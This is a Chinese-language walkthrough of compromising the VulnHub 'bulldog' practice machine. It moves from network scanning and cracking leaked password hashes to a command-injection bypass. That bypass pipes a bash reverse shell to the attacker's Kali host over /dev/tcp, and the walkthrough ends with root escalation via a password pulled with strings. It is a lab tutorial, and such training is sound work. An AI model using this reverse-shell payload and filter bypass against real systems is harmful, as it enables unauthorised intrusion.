文章目錄
- 一. bulldog靶機安裝
- 1. 下載bulldog
- 2. 開啟bulldog
- 二. bulldog靶機滲透
- 1. 資訊收集
- 2. Web滲透
- 3. 命令注入&nc反彈shell
- 4. 提權
一. bulldog靶機安裝
1. 下載bulldog
-
靶場地址:Bulldog - VulnHub (可自行下載)
-
百度網盤:bulldog
提取碼:qrnf -
將下載好的靶機存放在想存放的地方,建議放在其他虛擬機相同的目錄下
-
打開VMware,左上角檔案 - - 打開 - - 找到存放bulldog的位置
2. 開啟bulldog
- 開啟后無需進行其他操作
二. bulldog靶機滲透
- 設備資訊:
kali(NAT)IP:192.168.110.140
bulldog(NAT)IP:192.168.110.142 - 未安裝kali可點擊此教程安裝:
安裝Kali Linux虛擬機及VMware Tools附圖保姆級教程
1. 資訊收集
1)主機發現
- 打開 kali 進入終端,輸入 ifconfig 查詢本機IP,拿到本機所處網段 192.168.110.0/24
- 輸入 netdiscover -i eth0 -r 192.168.110.0/24(這里我們直接掃描C段)
-i:指定網卡設備
-r:指定掃描網段
- 發現目標靶機IP:192.168.110.142
2)埠掃描
- 輸入 masscan --rate=10000 --ports 0-65535 192.168.110.142,發現目標靶機打開80,8080,23埠
rate=每秒多少個資料包
ports 埠范圍
- 輸入 nmap -sV -T4 -O -p 23,80,8080 192.168.110.142 查看埠的詳細資訊
- -sV:掃描版本的資訊和開啟的服務
-T4:指定掃描程序中使用的時序(分為0-5等級,推薦用4)
-O:掃描作業系統
-p:指定埠 - 也可以選擇帶-A引數,詳細掃描開放埠的具體服務
- 可以發現目標主機開啟了23 (ssh服務) ,80 (http服務) ,8080 (http服務) 埠
3)子域名掃描
- 發現目標開啟http服務,主機訪問192.168.110.142
- 輸入 dirb http://192.168.110.142 掃描子域名
- 得到以下目錄:
http://192.168.110.142/admin/
http://192.168.110.142/dev/
http://192.168.110.142/admin/login/
http://192.168.110.142/dev/shell/
…
2. Web滲透
1)訪問 http://192.168.110.142/admin/,發現需要登錄
2)訪問 http://192.168.110.142/dev/,發現可以訪問
3)訪問 http://192.168.110.142/dev/shell/,發現不能訪問
4)回到 http://192.168.110.142/dev/,F12或右鍵查看源代碼,發現一一對應的可疑郵箱與疑似哈希密碼串,猜測其為用戶名及密碼
5)通過解密工具撞哈希值
- 常用MD5解密網站:
MD5解密 - 依次嘗試獲取到的密碼串,發現最后兩個解密成功
6)回到 http://192.168.110.142/admin/ 嘗試登錄
- 嘗試以 nick、sarah 作為用戶名,將 bulldog、bulldoglover 作為密碼登錄,登錄成功
7)發現此時 http://192.168.110.142/dev/shell/ 可以訪問,但只能使用列出的命令
3. 命令注入&nc反彈shell
- 由于部分命令被過濾,下面嘗試繞過反彈shell
1)回到kali終端,輸入 nc -lvp 1234 隨便設定一個埠進行監聽
2)在此輸入 echo ‘bash -i >& /dev/tcp/192.168.110.140/1234 0>&1’ | bash 嘗試反彈
- 由于 echo 是可以使用的,這里利用 echo 構建一個反彈shell的命令,然后用管道符交給 bash 執行
- 注意中間 IP 為 kali 的 IP
- 運行后發現 kali 監聽已接收到反彈 shell
- 此時已成功進入系統,但權限還不是root,下一步進行提權操作
4. 提權
- 切換成 root 用戶的前提是需要知道 root 用戶的密碼,所以我們這里的主要目標是在有限的權限里搜集到 root 的密碼,完成提權
1)輸入 cat /etc/passwd 查看用戶,發現 bulldogadmin 用戶
2)輸入 cd … 切換到 home 目錄下
3)輸入 cd bulldogadmin 進入該目錄下
4)輸入 ls -al 查看隱藏檔案,發現隱藏檔案 .hiddenadmindirectory
5)輸入 cd .hiddenadmindirectory 進入該目錄,ls -al 查看隱藏檔案,發現 customPermissionApp和note兩個檔案
6)分別使用 cat 查看,發現沒有可用資訊
7)利用 strings 查看可執行檔案中的內容,發現疑似密碼
- strings 命令用來提取和顯示非文本檔案中的文本字串
- 展開密碼串為:SUPERultimatePASSWORDyouCANTget
8)用 Python 呼叫本地的 shell 實作,輸入 python -c ‘import pty; pty.spawn("/bin/bash")’
9)輸入 sudo su - 進入登錄模式,然后輸入之前獲得的密碼串
- 提權成功
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/348284.html
標籤:其他
上一篇:hosts檔案
下一篇:程式員必備神器——Typora